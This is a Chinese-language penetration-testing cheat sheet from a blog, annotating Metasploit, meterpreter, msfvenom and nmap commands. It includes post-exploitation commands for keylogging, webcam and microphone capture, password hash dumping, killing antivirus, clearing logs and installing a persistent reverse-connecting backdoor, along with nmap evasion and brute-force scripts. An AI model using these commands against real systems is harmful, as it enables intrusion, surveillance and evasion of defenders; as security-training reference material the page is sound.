M09ic's Blog

# 使用前需要打开postgres数据库
service postgresql start

# 打开msf 控制台终端
msfconsole

# 初始化数据库
msfdb init

# 重新初始化数据库
msfdb reinit

# 查看数据库连接情况
db_status

# 建立数据库缓存
db_rebuild_cache

# 查看帮助文档
help

show exploits			# 查看所有可用的渗透攻击程序代码 

show auxiliary			# 查看所有可用的辅助攻击工具 

search [args]			# 查找需要的模块

info [args]				# 查看模块信息

use [args]				# 进入所选模块

show payloads			# 查看该模块适用的所有载荷代码 

show targets			# 查看该模块适用的攻击目标类型

show options			# 查看所有可用选项

show advanced			# 查看高级参数

set [args]				# 设置某个option参数

save					# 将当期配置保存

run						# 运行模块

back					# 回退

# 简单介绍基本参数
LHOST			# 获取shell的本地ip

LPORT			# 获取shell的本机端口

RHOST			# 攻击目标的ip

LPORT			# 攻击目标的端口

PAYLOAD			# 指定payload

TARGET			# 指定目标主机类型

use exploit/mulit/handler
set payload [PAYLOAD]
set lhost [LHOST]
set lport [LPORT]
run

seesions -l 			# 列出可用的session

sessions -d 			# 列出所有不活跃的session

sessions -i	[sessionId]	# 指定一个session

sessions -v				# 列出详细信息

sessions -c	[command]	# 指定一条命令,通过-i指定session

sessions -s [script]	# 在session中运行一个脚本,通过-i指定session

sessions -u	[sessionId]	# 将一个shell升级为metasploit shell

sessions -k	[sessionId]	# 杀死一个session

sessions -K				# 杀死所有session

# 基本命令
background			# 让meterpreter处于后台模式

quit				# 退出session

shell				# 获取shell权限

irb					# 开启ruby终端

# 文件系统命令
getwd 				# 查看当前工作目录  

upload 				 # 上传文件到目标机上  

download 			# 下载文件到本机上  

edit 				# 编辑文件  

search  			# 搜索文件

# 网络命令 
ipconfig | ifconfig # 查看网络接口信息  

arp					# 查看arp表

route				# 查看路由

getproxy			# 获取代理

portfwd  add -l 4444 -p 3389 -r 192.168.1.102 # 端口转发，本机监听4444，把目标机3389转到本机4444 
rdesktop -u Administrator -p ichunqiu 127.0.0.1:4444 #然后使用rdesktop来连接，-u 用户名 -p 密码
route 				# 获取路由表信息

# 系统命令
ps 							# 查看当前活跃进程 

migrate [pid] 				# 将Meterpreter会话移植到进程数位pid的进程中 

execute -H -i -f cmd.exe 	# 创建新进程cmd.exe，-H不可见，-i交互 

getpid 						# 获取当前进程的pid 

kill [pid] 					# 杀死进程 

getuid 						# 查看权限 

sysinfo 					# 查看目标机系统信息，如机器名，操作系统等 

shutdown					# 关机

# 实用功能
enumdesktops				# 用户登录数

keyscan_dump				# 键盘记录－下载

keyscan_start				# 键盘记录　－　开始

keyscan_stop				# 键盘记录　－　停止

uictl						# 获取键盘鼠标控制权

record_mic					# 音频录制

webcam_chat					# 查看摄像头接口

webcam_list					# 查看摄像头列表

webcam_stream				# 摄像头视频获取

getsystem					# 获取高权限

hashdump					# 下载账户hash

migrate						# 将自身注入到其他进程中

clearev						# 清除痕迹

screenshot					# 截屏


# run
run [scriptName|moudleName]				# 执行某个模块或脚本	

# 常用模块
run  persistence						# persistence 向目标主机注入后门程序
# run  persistence -X  -i  5  -p 4444  -r 172.17.11.18 
# -X 在目标主机上开机自启动
# -i 不断尝试反向连接的时间间隔

run metsvc 								# metsvc 注册服务

run packetrecorder						# 查看网络流量,-i 指定网卡

run get_local_subnets					# 获得本地网段

run getcountermeasure					# 显示HIPS和AV进程的列表，显示远程机器的防火墙规则，列出DEP和UAC策略

run scraper								# 获取网络共享信息

run killav								# 中止杀毒软件进程

run vnc									# 获得vnc远程桌面

run getgui  -e 							# 开启远程桌面 

run getgui -u example_username -p example_password # 添加账号
# 完整脚本列表在kali: /usr/share/metasploit-framework/scripts/meterpreter

# 常用模块
post/windows/gather/forensics/enum_drives	# 枚举存储器信息

post/windows/gather/checkvm					# 检查是否是虚拟机

post/windows/gather/enum_applications		# 获取目标主机上的软件安装信息

post/windows/gather/dumplinks				# 获取目标主机上最近访问过的文档、链接信息

post/windows/gather/enum_ie					# 读取目标主机IE浏览器cookies等缓存信息，嗅探目标主机登录过的各类账号密码

post/windows/manage/killav 					# 关闭杀毒软件,可能导致蓝屏

post/windows/escalate/bypassuac				# 绕过uac

post/windows/gather/hashdump				# 获取系统hash

post/windows/manage/enable_rdp				# 开启远程桌面

#msfvenom命令行选项
-p, --payload [payload]       	# 指定需要使用的payload(攻击荷载)

-l, --list [module_type]		# 列出指定模块的所有可用资源,模块类型包括: payloads, encoders, nops, all

-n, --nopsled [length]        	# 为payload预先指定一个NOP滑动长度

-f, --format [format]        	# 指定输出格式 (使用 --help-formats 来获取msf支持的输出格式列表)

-e, --encoder [encoder]       	# 指定需要使用的encoder（编码器）

-a, --arch [architecture]  		# 指定payload的目标架构

--platform   [platform]    		# 指定payload的目标平台

-s, --space [length]        	# 设定有效攻击荷载的最大长度

-b, --bad-chars [list]          # 设定规避字符集，比如: '\x00\xff'

-i, --iterations [count]        # 指定payload的编码次数

-c, --add-code [path]          	# 指定一个附加的win32 shellcode文件

-x, --template [path]          	# 指定一个自定义的可执行文件作为模板

-k, --keep                      # 保护模板程序的动作，注入的payload作为一个新的进程运行

--payload-options            	# 列举payload的标准选项

-o, --out [path]               	# 保存payload

-v, --var-name [name]           # 指定一个自定义的变量，以确定输出格式

--shellest                  	# 最小化生成payload

-h, --help                      # 查看帮助选项

--help-formats               	# 查看msf支持的输出格式列表

nmap cnblogs.com				# 指定域名

nmap 192.168.1.2				# 指定ip

nmap 192.168.1.2 192.168.1.5 	# 扫描多个目标	

nmap 192.168.1.1/24				# 指定网段

nmap 192.168.1.1-100 			# (扫描IP地址为192.168.1.1-192.168.1.100内的所有主机)

nmap -iL target.txt				# 指定列表文件

nmap -V 						# 查看nmap版本号

- open 				# 应用程序在该端口接收 TCP 连接或者 UDP 报文。 

- closed 			# 关闭的端口对于nmap也是可访问的， 它接收nmap探测报文并作出响应。但没有应用程序在其上监听。

- filtered 			# 由于包过滤阻止探测报文到达端口，nmap无法确定该端口是否开放。过滤可能来自专业的防火墙设备，路由规则 或者主机上的软件防火墙。

- unfiltered 		# 未被过滤状态意味着端口可访问，但是nmap无法确定它是开放还是关闭。 只有用于映射防火墙规则集的 ACK 扫描才会把端口分类到这个状态。

- open | filtered 	# 无法确定端口是开放还是被过滤， 开放的端口不响应就是一个例子。没有响应也可能意味着报文过滤器丢弃了探测报文或者它引发的任何反应。UDP，IP协议,FIN, Null 等扫描会引起。

- closed | filtered	# 无法确定端口是关闭的还是被过滤的

-p		# 指定端口 

-O		# 操作系统检测

-sV		# 服务版本识别

-A		# 加强模式,打开-O,-sV,-sC.--traceroute

-v 		# 详细输出扫描情况

-F		# 快速扫描,仅扫描列在nmap-services文件中的端口而避开所有其它的端口

-e		# 指定本机网卡

--proxies	# 指定HTTP或SOCKS代理

-6		# 开启ipv6

-sL		# 扫描列表 仅列出主机列表,不发送任何报文

-sP		# Ping扫描 , 仅使用ping进行主机发现

-Pn		# 禁用Ping进行主机发现 , 因为部分主机屏蔽了ping请求,但实际上是活跃的主机

#常用参数
-r			# 顺序扫描,将从按照从小到大的顺序扫描端口。

-top-ports [number] # 指定扫描nmap-services中最常用的前几个端口

#TCP扫描
-sT			# TCP连接扫描,默认将使用此方式,每次探测都会完成一次完整的三握手,扫描速度较慢,而且容易被发现.

-sS			# TCP SYN扫描(半开连接扫描),使用含SYN标志位的数据包进程端口探测,较为隐蔽.

-sN|sF|sX 	# TCP null,FIN,Xmas扫描,sN将所有标志位置空,sF仅设置FIN标志位,sX设置FIN,PSH,UGR标志位,多用来绕过无状态防火墙和报文过滤路由器.

-sA			# TCP ACK扫描,只设置ACK标志位,多用来检测目标使用使用数据包状态检测防火墙.

-sW			# TCP 窗口扫描,利用系统细节区分端口开放与关闭.

-sM			# TCP Maimon扫描,大多用于探测BSD及延伸的操作系统.

#UDP扫描
-sU			# 主机上部分端口可能运行着UDP的服务,例如视频,游戏等,扫描速度较慢,可靠性低.

-T[number]		# 设置时间模板（0-5级），默认为-T3
# 通过设置各个端口的扫描周期，从而来控制整个扫描的时间，比如说T0各个端口的扫描周期大约为5分钟，而T5各个端口的扫描周期为5ms，越快越容易被IDS发现
# paranoid（0）：每5分钟发送一次数据包，且不会以并行方式同时发送多组数据。这种模式 的扫描不会被IDS检测到。
# sneaky（1）：每隔15秒发送一个数据包，且不会以并行方式同时发送多组数据。
# polite（2）：每0.4	秒发送一个数据包，且不会以并行方式同时发送多组数据。
# normal（3）：此模式同时向多个目标发送多个数据包，为Nmap默认的模式，该模式能自 动在扫描时间和网络负载之间进行平衡。
# aggressive（4）：在这种模式下，Nmap	对每个既定的主机只扫描5分钟，然后扫描下一 台主机。它等待响应的时间不超过1.25秒。
# insane（5）：在这种模式下，Nmap	对每个既定的主机仅扫描75秒，然后扫描下一台主 机。它等待响应的时间不超过0.3秒。

-S			# 源地址欺骗，将自己的IP伪装成其他IP

-D			# 诱饵扫描，通过伪造大量IP与自己真实IP一起访问。

-f			# 分片处理，将TCP包拆分成多个IP包，避开某些防火墙。

-g			# 模拟本地端口

--scan-delay [time]		# 指定发包间隔

--max-parallelism 		#这个选项可限制Nmap,并发扫描的最大连接数。

--spoof-mac	[mac address|prefix|vendor name] # 伪装MAC地址

-oN			# 正常输出,不显示runtime信息和警告信息。

-oX			# 生成XML格式的报告,可以转成HTML文件,也可以被zenmap解析,建议使用

-oG			# 生成便于Grep使用的文件.

-oA			# 输出至所有格式

-sC			#启用default脚本

--script [filename|category|directories]	# 指定文件名,列表,目录执行脚本

--script-args [args]	# 指定所用脚本的参数

--script-trace			# 显示脚本执行过程中发送与接收的数据

--script-updatedb		# 更新脚本数据库

--script-help=[scripts]	# 显示脚本的帮助信息，其中<scripts>部分可以逗号分隔的文件或脚本类别

# auth：此类脚本使用暴力破解等技术找出目标系统上的认证信息。
# default：启用--sC	或者-A	选项时运行此类脚本。这类脚本同时具有下述特点：执行速度快；输出的信息有指导下一步操作的价值；输出信息内容丰富、形式简洁；必须可靠；不会侵入目标系统；能泄露信息给第三方。
# discovery：该类脚本用于探索网络。
# dos：该类脚本可能使目标系统拒绝服务，请谨慎使用。
# exploit：该类脚本利用目标系统的安全漏洞。在运行这类脚本之前，渗透测试人员需要获取 被测单位的行动许可。
# external：该类脚本可能泄露信息给第三方。
# fuzzer：该类脚本用于对目标系统进行模糊测试。
# instrusive：该类脚本可能导致目标系统崩溃，或耗尽目标系统的所有资源。
# malware：该类脚本检査目标系统上是否存在恶意软件或后门。
# safe：该类脚本不会导致目标服务崩溃、拒绝服务且不利用漏洞。
# version：配合版本检测选项（-sV），这类脚本对目标系统的服务程序进行深入的版本检 测。
# vuln：该类脚本可检测检査目标系统上的安全漏洞。

# 在Kali	Linux系统中，Nmap脚本位于目录/usr/share/nmap/scripts。

# 其他
banner			# 获取服务的banner信息
sniffer-detect	# 在网络中检测某主机是否存在窃听他人流量
# ftp
ftp-anon	# 检查目标ftp是否允许匿名登录,光能登陆还不够,它还会自动检测目录是否可读写

ftp-vuln-cve2010-4221	# ProFTPD 1.3.3c之前的netio.c文件中的pr_netio_telnet_gets函数中存在多个栈溢出

ftp-proftpd-backdoor	# CVE-2011-2523,ProFTPD 1.3.3c 被人插后门[proftpd-1.3.3c.tar.bz2],缺省只执行id命令,可自行到脚本中它换成能直接弹shell的命令

ftp-vsftpd-backdoor		#  VSFTPD v2.3.4 跟Proftp同样的问题,检查后门

# ssh
sshv1				#  验证安全性较低的ssh协议,sshv1可能被中间人攻击

# ssl
ssl-cert			# 检查ssl-cert证书问题

ssl-date			# 验证ssl证书期限

ssl-known-key		# 验证 Debian OpenSSL keys

sslv2				#  检查sslv2协议

ssl-enum-ciphers	# 验证弱加密套件

ssl-dh-params		# CVE 2015-4000

ssl-poodle			# SSL POODLE information leak漏洞

ssl-ccs-injection	# CVE-2014-0224 ssl-ccs-injection漏洞

ssl-heartbleed		# CVE-2014-0160 OpenSSL Heartbleed 心脏出血漏洞

ssl-dh-params		# SSL/TLS LogJam中间人安全限制绕过漏洞

# smtp
smtp-enum-users			# smtp用户枚举,当smtp存在配置错误时

smtp-vuln-cve2010-4344	#  Exim 4.70之前版本中的string.c文件中的string_vformat函数中存在堆溢出

smtp-vuln-cve2011-1720	# Postfix 2.5.13之前版本，2.6.10之前的2.6.x版本，2.7.4之前的2.7.x版本和2.8.3之前的2.8.x版本,存在溢出

smtp-vuln-cve2011-1764	# Exim "dkim_exim_verify_finish()" 存在格式字符串漏洞

# dns				
dns-zone-transfer	# 检查目标dns服务器是否允许传送

hostmap-ip2hosts	# 旁站查询 , 可能已失效

# database
mysql-empty-password	#  mysql 扫描root空密码

mysql-dump-hashes		# 到处mysql所有用户的hash

mysql-vuln-cve2012-2122	#  Mysql身份认证漏洞[MariaDB and MySQL  5.1.61,5.2.11, 5.3.5, 5.5.22]

ms-sql-empty-password	# 扫描mssql sa空密码

ms-sql-xp-cmdshell		# 利用xp_cmdshell,远程执行系统命令

ms-sql-dump-hashes		# 到处mssql数据库用户和密码hash

oracle-sid-brute		# 挂载字典爆破oracle的sid

oracle-enum-users		# 通过挂载字典遍历Oracle的可用用户

# web中间件(http|iis)
http-iis-short-name-brute	# iis 短文件扫描

http-iis-webdav-vuln		# MS09-020 iis 5.0 /6.0 允许任意用户通过搜索受密码保护的文件夹并尝试访问它来访问受保护的WebDAV文件夹

http-shellshock		# bash 远程执行

http-svn-info		# 探测svn

http-backup-finder	# 扫描网址备份

http-vuln-cve2015-1635	# iis6.0远程代码执行

http-slowloris		# http拒绝服务

http-methods		# 检查是否开启http-methods方法

http-put 			# 检查是否开启http put 方法

# vpn
pptp-version	# 识别目标pptp版本

# vnc 
vnc-info		# 收集vnc信息

# smb
smb-vuln-ms08-067
smb-vuln-ms10-054
smb-vuln-ms10-061
smb-vuln-ms17-010	# 远程代码执行

smb-enum-domains	# 域控制器信息收集，主机信息、用户、密码策略等

smb-enum-users		# 域控制器扫描

smb-enum-shares		# 遍历远程主机的共享目录

smb-enum-processes	# 通过SMB对主机的系统进程进行遍历

smb-enum-sessions	# 通过SMB获取域内主机的用户登录session，查看当前用户登录情况

smb-os-discovery	# 通过SMB协议来收集目标主机的操作系统、计算机名、域名、全称域名、域林名称、NetBIOS机器名、NetBIOS域名、工作组、系统时间等

smb-ls				# 列举共享目录内的文件，配合smb-enum-share使用

smb-psexec			# 获取到SMB用户密码时可以通过smb-psexec在远程主机来执行命令

smb-system-info		# 通过SMB协议获取目标主机的操作系统信息、环境变量、硬件信息以及浏览器版本等

# 弱密码爆破
rsync-brute				# rsync 弱密码爆破

rlogin-brute			# rlogin 弱密码爆破

vnc-brute				# vnc 弱密码爆破

pcanywhere-brute		# pcanywhere 弱密码爆破

nessus-brute			# nessus 弱密码爆破

snmp-brute				# snmap 弱密码爆破
		
telnet-brute			# telnet 弱密码爆破

ldap-brute				# ldap 弱密码爆破

pgsql-brute				#  postgresql 弱密码爆破

oracle-brute-stealth	# oracle 弱密码爆破,隐身

oracle-brute			# oracle 弱密码爆破

mongodb-brute			# mongodb 弱密码爆破

redis-brute				# redis 弱密码爆破

xmpp-brute				# xmpp爆破

ftp-brute				# ftp爆破脚本 [只会尝试一些比较简单的弱口令,时间可能要稍微长一些(挂vpn以后这个爆破速度可能会更慢)
smtp-brute				# smtp 弱口令爆破

pop3-brute 				# pop3 弱口令爆破

imap-brute				# imap 弱口令爆破

informix-brute			# informix爆破脚本

mysql-brute				# mysql 弱密码爆破

ms-sql-brute			# sa 弱密码爆破

nexpose-brute			# nexpose 弱密码爆破



# exploit
http-vuln-cve2015-1427	# cve-2015-1427 ElasticSearch远程代码执行

http-vuln-cve2014-8877 	# WordPress CM Download Manager远程代码执行

# shodan
shodan-api		# 使用shodan

# 验证ssl漏洞
--script sshv1,ssl-ccs-injection,ssl-cert,ssl-date,ssl-dh-params,ssl-enum-ciphers,ssl-google-cert-catalog,ssl-heartbleed,ssl-known-key,sslv2

# 常规漏洞扫描
--script dns-zone-transfer,ftp-anon,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,http-backup-finder,http-cisco-anyconnect,http-iis-short-name-brute,http-put,http-php-version,http-shellshock,http-robots.txt,http-svn-enum,http-webdav-scan,iis-buffer-overflow,iax2-version,memcached-info,mongodb-info,msrpc-enum,ms-sql-info,mysql-info,nrpe-enum,pptp-version,redis-info,rpcinfo,samba-vuln-cve-2012-1182,smb-vuln-ms08-067,smb-vuln-ms17-010,snmp-info,sshv1,xmpp-info,tftp-enum,teamspeak2-version

# 常见服务弱密码爆破
--script ftp-brute,imap-brute,smtp-brute,pop3-brute,mongodb-brute,redis-brute,ms-sql-brute,rlogin-brute,rsync-brute,mysql-brute,pgsql-brute,oracle-sid-brute,oracle-brute,rtsp-url-brute,snmp-brute,svn-brute,telnet-brute,vnc-brute,xmpp-brute